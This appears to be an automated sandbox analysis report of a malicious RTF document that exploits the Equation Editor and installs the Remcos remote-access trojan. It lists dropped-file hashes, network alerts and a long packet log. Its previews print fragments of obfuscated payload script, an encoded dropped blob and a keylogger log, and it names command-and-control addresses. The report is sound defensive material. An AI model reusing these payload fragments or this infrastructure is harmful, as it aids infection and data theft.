                                                        Entropy (8bit):2.4797606462020307
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                        MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                        SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                        SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                        SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):519984
                                                        Entropy (8bit):5.97310447226679
                                                        Encrypted:false
                                                        SSDEEP:6144:ZhZQKJ7e1+X814RJz1/sEa4Gv9hbtE9XcA4009r0KOD7hXDd+NayYrpqy2RtCPKZ:ZhJecX3jh/PGvrsXcAm0PdDdrEPR1Z
                                                        MD5:047E0275BDD0927F6EFEF87097F21863
                                                        SHA1:4299854E50DA9BF541FA2860DD03B635D7DFBA47
                                                        SHA-256:E0E516EA98D02BC1529767D9C3524B6EC48342AF2C5A704CE976D5F2430DF1C2
                                                        SHA-512:B094D60E78B9FD9C230BF53774BA3853321A37BE02174844B7B6B39B977641438310A14267A26977F4C88DB45E52AE5E6F0F98EBB74D8466E960FD1B958574E3
                                                        Malicious:false
                                                        Preview:2cnYwutE+YdSYLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTprwAAANn/h8nrXvqjJk21tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbUfJd7km9vi60InK4Vpzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs4PZebdwetQhimmGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoPgaMAAAAPcvIpD2Tu60wy73FW9fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX1mw9uwWYP/vDrRP8bZXdHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dH3eHZ4etYLaRSf25ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubm5ubtn0D/7v600+Ib8dCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCrvYWg8A2f/Z/utL832YKDc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):415824
                                                        Entropy (8bit):3.5864483548852926
                                                        Encrypted:false
                                                        SSDEEP:3072:bHGMwf1YFjhNe4VTdRnTT8w4TW72qjnEgFypBzxjJS7GzYhOJ8XuBYO0zCV2:Xwf1YFB2qjt
                                                        MD5:4D03B030F4DB434DA80E0EC3FA7E4398
                                                        SHA1:0B4EED00595BE5235F5A51CEBEDA6FA31402B94B
                                                        SHA-256:90AFE2E4506B34BD63E597279707D13C6D8512FD52E0B670C9E45890211C76B6
                                                        SHA-512:7EC4DF4E21931E9091E77D9A23C7D81DE11B89C3D0968CD6E8ABA8F425CDA85B357E4410B3A5A0BB28E80C2AD4999D8C3CC1FBA06A2346720F3ABAD435CE9EBB
                                                        Malicious:true
                                                        Preview:..d.i.m. .g.a.m.e.l.a.n. .....g.a.m.e.l.a.n. .=. .o.p.s.o.p.h.a.g.i.a.....c.a.b.i.r.t.o.(.".b.i.s.t.o.r.t.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".l.a.c.h.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".c.a.n.t.o.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".v.u.l.g.o.c.r.a.c.i.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".c.o.i.s.i.c.a.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".p.o.r.t.e.l.l.o.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.0.9._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".X._.H.e.l.p.U.r.i.s._.0.1.0._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.b.i.r.t.o.(.".L._.H.e.l.p.U.r.i.s._.0.1.1._.0._.M.e.s.s.a.g.e.".). .&. .g.a.m.e.l.a.n. .&. ._.....c.a.
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):408
                                                        Entropy (8bit):3.479885076475323
                                                        Encrypted:false
                                                        SSDEEP:6:6lVZO5YcIeeDAlMlVZsIbWASlVqwfbSNombQ8lVvblbQB:6lVcecmlVuIbWtlVVyDlVvFM
                                                        MD5:875058CC2636A58F81C1316E0C9639D2
                                                        SHA1:C00D2A4E4F55952A4FC624D933D8EB4E2738C9A1
                                                        SHA-256:899920844F6FD747AF9EA869D5A9AC024996EA6173682EC67B5C251883831100
                                                        SHA-512:7D9ED6238F01D60AEB4BEAAA54CF5893A96ACB90F7FB610E275C571BDDCB75A98BF40D952A2398D2ADA78FCF6324FA2B37B67E8FE9CF232F7FE14AA88E4C2929
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\sfvnspt.dat, Author: Joe Security
                                                        Preview:....[.2.0.2.4./.0.7./.2.6. .0.9.:.1.0.:.5.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.7./.2.6. .0.9.:.1.0.:.5.4. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.2.0.2.4./.0.7./.2.6. .0.9.:.1.5.:.0.5. .g.i.r.l.f.r.n.d. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.2.0.2.4./.0.7./.2.6. .0.9.:.1.6.:.2.9. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].....
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.4797606462020307
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                                        MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                                        SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                                        SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                                        SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                        File type:Rich Text Format data, version 1
                                                        Entropy (8bit):2.742026559641091
                                                        TrID:
                                                        • Rich Text Format (5005/1) 55.56%
                                                        • Rich Text Format (4004/1) 44.44%
                                                        File name:girlfrnd.doc
                                                        File size:83'905 bytes
                                                        MD5:9f63ee5ef179cfcf56619e1c9d44447a
                                                        SHA1:6c9efbc2d4a76e25d826f85b7f0d27906cade93a
                                                        SHA256:59d95b241a02fbef4d098fe7ff3ce6a5b97e638661429702744436c90c3047fa
                                                        SHA512:4333778ce1805bc95f648eb17b614ed29561431623ab1e6b5a12c6b85338a269e6aabfc7d78fff5170afedb839477aa19947f9afc3c123e9c8920a82d5165f2e
                                                        SSDEEP:768:/GsPG7psvvYOj60coo9jYt2uICjDdY29Hnv:/GCkWv7O9jxqjDd7F
                                                        TLSH:A383F198E78F41AACF50A237031A0A8945FCB73EB71145B6346C977137EE83D50A69BC
                                                        File Content Preview:{\rtf1...........{\*\fontinfo695314223 \,}.{\980066950`-@!_.);^_?5`%[?~-<3&5,7^,>.[#:%0;(^`.[6[9#^0<?|]][$~&3:+*424`?*23$0??&*:$/,<^9?.]?<|_=3.88_?:?%&0.2:/!(*~:<<.>.9-~%..(?&95?-;%-2^?)?/=8[]*(.:~=+?$?5+?<|)]?$4'^_@3._6;[&+^2_7(=4#''.?=.[/?[.!5'.@]?*,)-6
                                                        Icon Hash:2764a3aaaeb7bdbf
                                                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                        0000017D1hno
                                                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                        2024-07-26T15:11:22.810476+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode4434917293.113.54.56192.168.2.22
                                                        2024-07-26T15:11:16.475601+0200TCP2012510ET SHELLCODE UTF-8/16 Encoded Shellcode4434917193.113.54.56192.168.2.22
                                                        2024-07-26T15:10:54.085958+0200TCP2020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M18049165104.168.45.34192.168.2.22
                                                        2024-07-26T15:11:05.730752+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa4916980192.168.2.22178.237.33.50
                                                        2024-07-26T15:10:51.938874+0200TCP2047750ET MALWARE Base64 Encoded MZ In Image8049164198.46.176.133192.168.2.22
                                                        2024-07-26T15:11:07.096479+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection4916757483192.168.2.22192.253.251.227
                                                        2024-07-26T15:11:22.691893+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H49172443192.168.2.2293.113.54.56
                                                        2024-07-26T15:11:07.095485+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection4916857483192.168.2.22192.253.251.227
                                                        2024-07-26T15:11:02.622232+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection4916657483192.168.2.22192.253.251.227
                                                        2024-07-26T15:10:53.051850+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image8049164198.46.176.133192.168.2.22
                                                        2024-07-26T15:11:55.226848+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection4917457483192.168.2.22192.253.251.227
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 26, 2024 15:10:46.393496037 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.398515940 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.398596048 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.398715019 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.403497934 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.931420088 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.931502104 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.931763887 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.931775093 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.931818008 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.932776928 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.932789087 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.932836056 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.932836056 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.934456110 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.934468031 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.934509039 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.936172962 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.936187029 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.936240911 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.937915087 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.937968016 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.938055038 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.938098907 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.938934088 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.938997030 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:46.939269066 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:46.939313889 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.024466038 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.024574995 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.024738073 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.024758101 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.024802923 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.024802923 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.026113987 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.026129961 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.026179075 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.026179075 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.027376890 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.027393103 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.027436972 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.028878927 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.028896093 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.028938055 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.028938055 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.030374050 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.030391932 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.030437946 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.030437946 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.031847954 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.031866074 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.031912088 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.031913042 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.033330917 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.033348083 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.033361912 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.033396006 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.033396006 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.034522057 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.034538031 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.034584045 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.034584045 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.035712957 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.035728931 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.035775900 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.035892963 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.036880016 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.036896944 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.036910057 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.036945105 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.036945105 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.036945105 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.125082016 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.125143051 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.125323057 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.125339031 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.125382900 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.125382900 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.126521111 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.126537085 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.126579046 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.126701117 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.127744913 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.127759933 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.127811909 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.127811909 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.129112959 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.129128933 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.129172087 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.129173040 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.130472898 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.130489111 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.130536079 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.130536079 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.131867886 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.131884098 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.131931067 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.131931067 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.133219957 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.133235931 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.133250952 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.133276939 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.133306980 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.134344101 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.134360075 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.134406090 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.134407043 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.135593891 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.135611057 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.135657072 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.135658026 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.136562109 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.136579037 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.136626959 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.136626959 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.137602091 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.137618065 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.137631893 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.137665033 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.137665987 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.138675928 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.138691902 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.138737917 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.138737917 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.139787912 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.139803886 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.139843941 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.139873028 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.140876055 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.140892029 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.140938997 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.140938997 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.141925097 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.141978979 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.217544079 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.217631102 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.217808962 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.217827082 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.217859983 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.217895031 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.218802929 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.218818903 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.218863010 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.218863964 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.219805956 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.219821930 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.219877005 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.219877005 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.220928907 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.220944881 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.220988989 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.220988989 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.222039938 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.222058058 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.222103119 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.222103119 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.223190069 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.223206997 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.223251104 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.223251104 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.224239111 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.224256992 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.224272013 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.224301100 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.224301100 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.224330902 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.225609064 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.225625038 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.225670099 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.225671053 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.226572037 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.226588964 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.226629972 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.226629972 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.227370024 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.227389097 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.227430105 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.227430105 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.228279114 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.228296041 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.228310108 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.228338003 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.228338957 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.228373051 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.229199886 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.229217052 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.229259014 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.229259014 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.230041981 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.230067015 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.230098963 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.230129004 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.230927944 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.230945110 CEST8049163104.168.45.34192.168.2.22
                                                        Jul 26, 2024 15:10:47.230984926 CEST4916380192.168.2.22104.168.45.34
                                                        Jul 26, 2024 15:10:47.230984926 CEST4916380192.168.2.22104.168.45.34
